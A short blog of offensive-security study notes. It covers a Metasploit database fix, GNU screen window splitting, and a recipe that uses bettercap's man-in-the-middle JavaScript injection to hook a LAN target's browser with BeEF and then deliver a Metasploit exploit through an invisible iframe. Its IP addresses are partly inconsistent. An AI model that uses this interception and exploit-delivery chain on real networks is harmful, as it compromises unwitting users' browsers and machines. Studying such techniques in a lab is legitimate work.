Fixing “Database not connected or cache not built” in Metasploit

Configure the database service to start automatically
update-rc.d postgresql enable

Initialize the database
msfdb init

Launch msfconsole and rebuild the cache
root@KALI:~# msfconsole
msf > db_rebuild_cache

Wait a while. It will finish eventually.

Metasploit, Bettercap, and BeEF

Metasploit, Bettercap, and BeEF work well together. Below is the basic syntax I used in Kali. It assumes the default gateway is 192.168.1.1, the Kali host is 192.168.1.50, and the target is 192.168.100.

Start Metasploit using msgrpc
root@KALI:~# msfconsole
msf > load msgrpc ServerHost=192.168.1.50 Pass=abc123

Start BeEF
root@KALI:~# cd /usr/share/beef-xss
root@KALI:~# ./beef

Copy the hook URL from the resulting command output.
(Will look something like this: http://192.168.1.100:3000/hook.js)

Start bettercap with the arguments to point the target machine to BeEF.
root@KALI:~# bettercap -T 192.168.1.1 -T 192.168.1.100 --proxy-module injectjs --js-url http://192.168.1.100:3000/hook.js

Open up the BeEF Admin URL by browsing to http://192.168.1.50:3000/ui/panel

Assuming a client is hooked, investigate the client to determine likely Metasploit options. Get Metasploit. Use the “Create invisible iframe” command to spawn an invisible iframe to the URL of the Metasploit exploit.

That’s it.

References:
https://www.metasploit.com/
https://www.bettercap.org/
http://beefproject.com/
https://sathisharthars.com/

The Screen Command

So there are times where I only have a single SSH session but want to be able to monitor multiple running processes. For example, Metasploit, BeEF, and Bettercap work well together, but it’s nice to be able to concurrently watch the output of all of them.

So I discovered the screen command. It lets me split up a single session into multiple smaller sessions. While it seems really powerful, thus far I’m just using it to give me four sessions at once.

I eventually just memorized the key sequence to get four evenly divided sessions going.

[CTRL]+[a] – (Enter the command mode.)
[SHIFT]+[s] – (Split the window horizontally.)
[CTRL]+[a] – (Enter the command mode.)
[SHIFT]+[\] – (Split the window vertically.)
[CTRL]+[a] – (Enter the command mode.)
[TAB] – (Move to the next window.)
[CTRL]+[c] – (Launch a shell in the current window.)
[CTRL]+[a] – (Enter the command mode.)
[TAB] – (Move to the next window.)
[CTRL]+[a] – (Enter the command mode.)
[CTRL]+[c] – (Launch a shell in the current window.)
[CTRL]+[a] – (Enter the command mode.)
[SHIFT]+[\] – (Split the window vertically.)
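
The same four-region layout can be built from a config file instead of typed by hand. This is an added example, not from the original post: the function name, the file path ~/.screenrc.quad and the window titles are assumptions, and it needs a GNU screen release that has `split -v` and the `layout` commands.

```shell
#!/bin/sh
# Added example: generate a screenrc that builds the four-region layout
# at startup, replacing the memorized split/focus key sequence.
# File path and window titles are assumptions chosen for illustration.

write_quad_screenrc() {
    # $1 = output path
    # $2..$5 = titles for top-left, top-right, bottom-left, bottom-right
    rc=$1
    cat > "$rc" <<EOF
startup_message off
# A named layout keeps the regions across detach and reattach.
layout autosave on
layout new quad
# Create the four windows first; each one starts the default shell.
screen -t "$2" 0
screen -t "$3" 1
screen -t "$4" 2
screen -t "$5" 3
# Top-left region: split top/bottom, then split the top left/right.
select 0
split
split -v
# Top-right region.
focus
select 1
# Bottom region: show window 2, then split it left/right.
focus
select 2
split -v
# Bottom-right region.
focus
select 3
# Wrap focus back to the top-left region and store the layout.
focus
layout save quad
EOF
}

# Run as: sh quad-screen.sh --launch
if [ "${1:-}" = "--launch" ]; then
    rc="${HOME}/.screenrc.quad"
    write_quad_screenrc "$rc" msf beef bettercap shell
    exec screen -c "$rc"
fi
```

Because `screen -c` reads this file instead of the default ~/.screenrc, an existing personal config is left untouched.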

References:
https://www.gnu.org/software/screen/manual/screen.html

About Pyrrh1c

The entire purpose of this blog is to track the things I’m learning as I study offensive security. It will act as a reference point for the future.

It’s called Pyrrh1c in reference to the phrase “Pyrrhic victory”. I always accomplish my objectives, even if the effort and cost are disproportionate to the goal. So since this study has already occupied a ridiculous amount of my time, why not embrace the madness?